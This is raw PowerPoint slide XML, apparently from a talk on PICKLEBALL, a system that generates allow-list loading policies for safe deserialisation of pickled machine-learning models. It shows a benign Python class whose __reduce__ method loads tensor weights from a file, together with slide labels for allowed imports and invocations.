            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__init__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, weights: Tensor):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.weights = weights</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        return (read_weights_to_tensor, (self.filename,))</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(filename: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>) -&gt; Tensor:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    # Read a weights file and return a Tensor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="Google Shape;800;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Python library source code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="Google Shape;801;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645325" y="2155500"/>
            <a:ext cx="2756700" cy="1293000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Invocations:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="802" name="Google Shape;802;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5607550" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Generated loading policy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="Google Shape;803;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532525" y="943025"/>
            <a:ext cx="4708200" cy="755100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A loading policy represents all callables that could appear in any pickle program encoding a valid model.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Google Shape;804;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471175" y="3131775"/>
            <a:ext cx="1721700" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695025" y="2812375"/>
            <a:ext cx="548700" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRP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09" name="Shape 809"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Google Shape;810;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Generation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="811" name="Google Shape;811;p66"/>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812" name="Google Shape;812;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="2155500"/>
            <a:ext cx="4708200" cy="1723800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
